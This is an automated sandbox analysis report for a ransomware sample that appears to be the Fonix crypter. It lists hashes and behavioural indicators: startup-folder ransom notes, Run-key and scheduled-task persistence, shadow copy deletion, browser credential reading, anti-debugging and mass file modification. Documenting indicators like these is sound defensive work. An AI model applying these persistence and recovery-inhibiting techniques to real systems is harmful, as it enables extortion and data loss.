de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e

General

Target

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
Size

6.0MB
MD5

df472f90c33e6c341a74fe1ca29dac70
SHA1

d7512488de06b677751014bdc48302c179542558
SHA256

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e
SHA512

4257e88d9c6f5eec59d1da6749c386b3859be04159ec37aba2adb3704e5f2ce11ef3adfb086b86d1bea03db300e1d82cab08f266cf6fae4d8f929e71918ddcf9

Score

9^/10

persistence evasion spyware ransomware discovery

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

pid	process
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Drops startup file 4 IoCs

Processes:

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

820 schtasks.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1456 icacls.exe

pid	process
820	schtasks.exe

pid	process
1456	icacls.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

vssvc.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	2028	vssvc.exe
Token: SeRestorePrivilege	2028	vssvc.exe
Token: SeAuditPrivilege	2028	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe

Adds Run entry to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonixCrypter.exe"	reg.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

548 vssadmin.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

pid process

1100 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

pid	process
548	vssadmin.exe

Suspicious use of WriteProcessMemory 104 IoCs

Processes:

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1100 wrote to memory of 1296	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1296	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1296	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1296	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1296 wrote to memory of 820	1296	cmd.exe	schtasks.exe
PID 1296 wrote to memory of 820	1296	cmd.exe	schtasks.exe
PID 1296 wrote to memory of 820	1296	cmd.exe	schtasks.exe
PID 1296 wrote to memory of 820	1296	cmd.exe	schtasks.exe
PID 1100 wrote to memory of 1312	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1312	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1312	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1312	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1312 wrote to memory of 1308	1312	cmd.exe	reg.exe
PID 1312 wrote to memory of 1308	1312	cmd.exe	reg.exe
PID 1312 wrote to memory of 1308	1312	cmd.exe	reg.exe
PID 1312 wrote to memory of 1308	1312	cmd.exe	reg.exe
PID 1100 wrote to memory of 1392	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1392	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1392	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1392	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1392 wrote to memory of 1400	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1400	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1400	1392	cmd.exe	reg.exe
PID 1392 wrote to memory of 1400	1392	cmd.exe	reg.exe
PID 1100 wrote to memory of 1456	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1456	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1456	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1456	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1456 wrote to memory of 1480	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 1480	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 1480	1456	cmd.exe	reg.exe
PID 1456 wrote to memory of 1480	1456	cmd.exe	reg.exe
PID 1100 wrote to memory of 1520	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1520	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1520	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 1520	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1520 wrote to memory of 304	1520	cmd.exe	reg.exe
PID 1520 wrote to memory of 304	1520	cmd.exe	reg.exe
PID 1520 wrote to memory of 304	1520	cmd.exe	reg.exe
PID 1520 wrote to memory of 304	1520	cmd.exe	reg.exe
PID 1100 wrote to memory of 308	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 308	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 308 wrote to memory of 844	308	cmd.exe	reg.exe
PID 308 wrote to memory of 844	308	cmd.exe	reg.exe
PID 308 wrote to memory of 844	308	cmd.exe	reg.exe
PID 308 wrote to memory of 844	308	cmd.exe	reg.exe
PID 1100 wrote to memory of 272	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 272	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 272	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 272	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 272 wrote to memory of 772	272	cmd.exe	reg.exe
PID 272 wrote to memory of 772	272	cmd.exe	reg.exe
PID 272 wrote to memory of 772	272	cmd.exe	reg.exe
PID 272 wrote to memory of 772	272	cmd.exe	reg.exe
PID 1100 wrote to memory of 992	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 992	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 992	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 1100 wrote to memory of 992	1100	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe	cmd.exe
PID 992 wrote to memory of 736	992	cmd.exe	reg.exe
PID 992 wrote to memory of 736	992	cmd.exe	reg.exe
PID 992 wrote to memory of 736	992	cmd.exe	reg.exe
PID 992 wrote to memory of 736	992	cmd.exe	reg.exe

Disables Task Manager via registry modification
evasion
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Drops file in Program Files directory 10510 IoCs

Processes:

de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Angles.eftx	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\Issue Tracking.gta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\WORDIRM.XML	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Dialog.accdt	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Help\1049\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01840_.GIF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.HXS	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\Cpriv.key	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\WSS.ICO	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105496.WMF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH.HXS	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay.css	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Portal\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\# How To Decrypt Files #.hta	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BABY_01.MID	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\US_export_policy.jar	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
